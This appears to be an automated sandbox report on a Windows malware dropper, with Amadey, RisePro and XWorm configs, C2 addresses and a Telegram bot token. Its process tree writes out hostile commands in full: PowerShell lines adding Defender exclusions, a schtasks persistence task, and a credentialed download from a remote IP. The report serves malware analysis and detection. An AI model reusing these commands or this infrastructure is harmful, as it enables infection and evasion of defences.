Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-05-2024 14:22
General
-
Target
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe
-
Size
1.7MB
-
MD5
d5be6b852722db508fdb29104d5aa037
-
SHA1
89e8ea27ef760ee059731380397446c1cf03c55d
-
SHA256
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94
-
SHA512
ba62ca856fb72f3a68edc50bbb8e8ab914d6f9526d5d84a92ff0f25aa57e149e742e881bf7a967f3a40b445725fffd6d1f6f141f94fe9f271fb04103761b516b
-
SSDEEP
24576:7MkBOGtVfX0WrHsyNrIngnjP/+it6rVx5KiHtpSEMbTRjc55wIVWhvi1Frm7mKj:IkB/LfrHRTjOi+3KiNY5smmwa1mmc
Malware Config
Extracted
http://193.222.96.193:81/besho/besho.mp4
Extracted
amadey
4.20
http://5.42.96.141
http://5.42.96.7
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%ProgramData%
-
install_file
taskmgr.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/3016-238-0x000000001CAB0000-0x000000001CABE000-memory.dmp disable_win_def -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral2/files/0x000100000002a9f7-95.dat family_xworm behavioral2/memory/3016-109-0x0000000000EA0000-0x0000000000ED8000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3016-197-0x000000001DCD0000-0x000000001DDF0000-memory.dmp family_stormkitty -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
Processes:
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exeamers.exeaxplons.exeb26503bc6d.exeaxplons.exeexplorku.exeaxplons.exeaxplons.exeexplorku.exeexplorku.exeexplorku.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b26503bc6d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 9 2200 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2228 powershell.exe 3984 powershell.exe 2360 powershell.exe 3200 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
amers.exeexplorku.exeb26503bc6d.exeexplorku.exeexplorku.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exeexplorku.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b26503bc6d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b26503bc6d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe -
Drops startup file 2 IoCs
Processes:
taskmgr.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.lnk taskmgr.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.lnk taskmgr.exe -
Executes dropped EXE 14 IoCs
Processes:
explorku.exeamers.exeaxplons.exeb26503bc6d.exetaskmgr.exeexplorku.exeaxplons.exetaskmgr.exeexplorku.exeaxplons.exetaskmgr.exetaskmgr.exeexplorku.exeaxplons.exepid Process 2580 explorku.exe 4976 amers.exe 3348 axplons.exe 2308 b26503bc6d.exe 3016 taskmgr.exe 1744 explorku.exe 1660 axplons.exe 4976 taskmgr.exe 4624 explorku.exe 1744 axplons.exe 2256 taskmgr.exe 2392 taskmgr.exe 4172 explorku.exe 4260 axplons.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
amers.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/3672-0-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-2-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-1-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-3-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-6-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-8-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-5-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-4-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/memory/3672-7-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/files/0x000100000002a9eb-14.dat themida behavioral2/memory/2580-22-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-28-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-30-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-29-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-26-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-24-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-23-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-27-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2580-25-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/3672-21-0x0000000000170000-0x00000000006C2000-memory.dmp themida behavioral2/files/0x000100000002a9f0-68.dat themida behavioral2/memory/2308-85-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-83-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-82-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-86-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-84-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-90-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-89-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-88-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2308-87-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/2580-110-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/2308-158-0x0000000000C20000-0x0000000001292000-memory.dmp themida behavioral2/memory/1744-160-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-162-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-163-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-164-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-161-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-166-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-167-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-165-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/1744-172-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-254-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-257-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-256-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-258-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-255-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-259-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-260-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-261-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4624-267-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4172-290-0x0000000000310000-0x0000000000862000-memory.dmp themida behavioral2/memory/4172-301-0x0000000000310000-0x0000000000862000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorku.exetaskmgr.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\b26503bc6d.exe = "C:\\Users\\Admin\\1000006002\\b26503bc6d.exe" explorku.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr = "C:\\ProgramData\\taskmgr.exe" taskmgr.exe -
Processes:
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exeexplorku.exeb26503bc6d.exeexplorku.exeexplorku.exeexplorku.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b26503bc6d.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
amers.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exepid Process 4976 amers.exe 3348 axplons.exe 1660 axplons.exe 1744 axplons.exe 4260 axplons.exe -
Drops file in Windows directory 2 IoCs
Processes:
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exeamers.exedescription ioc Process File created C:\Windows\Tasks\explorku.job 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe File created C:\Windows\Tasks\axplons.job amers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
taskmgr.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
taskmgr.exepid Process 3016 taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
amers.exeaxplons.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exeaxplons.exepowershell.exeaxplons.exeaxplons.exepid Process 4976 amers.exe 4976 amers.exe 3348 axplons.exe 3348 axplons.exe 2360 powershell.exe 2360 powershell.exe 3200 powershell.exe 3200 powershell.exe 2228 powershell.exe 2228 powershell.exe 3984 powershell.exe 3984 powershell.exe 3016 taskmgr.exe 1660 axplons.exe 1660 axplons.exe 2200 powershell.exe 2200 powershell.exe 3016 taskmgr.exe 1744 axplons.exe 1744 axplons.exe 4260 axplons.exe 4260 axplons.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
taskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exetaskmgr.exetaskmgr.exedescription pid Process Token: SeDebugPrivilege 3016 taskmgr.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 3016 taskmgr.exe Token: SeDebugPrivilege 4976 taskmgr.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 2256 taskmgr.exe Token: SeDebugPrivilege 2392 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
taskmgr.exepid Process 3016 taskmgr.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exeexplorku.exeamers.exeaxplons.exetaskmgr.exeWScript.exedescription pid Process procid_target PID 3672 wrote to memory of 2580 3672 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe 81 PID 3672 wrote to memory of 2580 3672 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe 81 PID 3672 wrote to memory of 2580 3672 71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe 81 PID 2580 wrote to memory of 2872 2580 explorku.exe 82 PID 2580 wrote to memory of 2872 2580 explorku.exe 82 PID 2580 wrote to memory of 2872 2580 explorku.exe 82 PID 2580 wrote to memory of 4976 2580 explorku.exe 83 PID 2580 wrote to memory of 4976 2580 explorku.exe 83 PID 2580 wrote to memory of 4976 2580 explorku.exe 83 PID 4976 wrote to memory of 3348 4976 amers.exe 84 PID 4976 wrote to memory of 3348 4976 amers.exe 84 PID 4976 wrote to memory of 3348 4976 amers.exe 84 PID 2580 wrote to memory of 2308 2580 explorku.exe 85 PID 2580 wrote to memory of 2308 2580 explorku.exe 85 PID 2580 wrote to memory of 2308 2580 explorku.exe 85 PID 3348 wrote to memory of 3016 3348 axplons.exe 86 PID 3348 wrote to memory of 3016 3348 axplons.exe 86 PID 3016 wrote to memory of 2360 3016 taskmgr.exe 88 PID 3016 wrote to memory of 2360 3016 taskmgr.exe 88 PID 3016 wrote to memory of 3200 3016 taskmgr.exe 90 PID 3016 wrote to memory of 3200 3016 taskmgr.exe 90 PID 3016 wrote to memory of 2228 3016 taskmgr.exe 92 PID 3016 wrote to memory of 2228 3016 taskmgr.exe 92 PID 3016 wrote to memory of 3984 3016 taskmgr.exe 94 PID 3016 wrote to memory of 3984 3016 taskmgr.exe 94 PID 3016 wrote to memory of 1304 3016 taskmgr.exe 96 PID 3016 wrote to memory of 1304 3016 taskmgr.exe 96 PID 3016 wrote to memory of 3172 3016 taskmgr.exe 101 PID 3016 wrote to memory of 3172 3016 taskmgr.exe 101 PID 3172 wrote to memory of 2200 3172 WScript.exe 102 PID 3172 wrote to memory of 2200 3172 WScript.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe"C:\Users\Admin\AppData\Local\Temp\71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"6⤵
- Creates scheduled task(s)
PID:1304
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"6⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
-
-
-
-
C:\Users\Admin\1000006002\b26503bc6d.exe"C:\Users\Admin\1000006002\b26503bc6d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2308
-
-
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1744
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1660
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4624
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1744
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4172
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4260
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
733B
MD568c8c79d84f5e3f10dd9328272b0ac55
SHA15ab9a13ec0d01fc1ed71c27a1a23a61019cb8946
SHA25629841f038da6a26dac5df28f23b4adcb080f5b0a2312bf996c8073940849eef6
SHA512d86bd0ac3bd58ee9a1b06e1edba3c03788136292d81bd9cf025525c3a0e40bba9a7b6d5859833a9d470d29ab31b35d5515855a78691bfe54477631d9a0733f6a
-
Filesize
2.1MB
MD5ea46597fd930b2febc255656c123cce6
SHA1e8247e4502dcbab1678ad1062357c7a3183e5a04
SHA256b3010f5232a4d132e18d49b08c9ab0961abfd0680806cbff7cfd5598838c0ff0
SHA5126af55ca85337d1e2e59bd020126179ae72eca7a41e4c2b5199ba0aea281d98307b014da31c49d6f152cbb3e0af785918ca0cf404aad3ab40fec6c6bf104350d3
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD5856900844f6f1c326c89d0bcfb2f0c28
SHA11caad440d46fa8c0cbed4822b4be2bbdddba97c2
SHA256ae24414ec53b3ae43ddbf1ff7b6643f8bf45281406f6415742f4305360d70a32
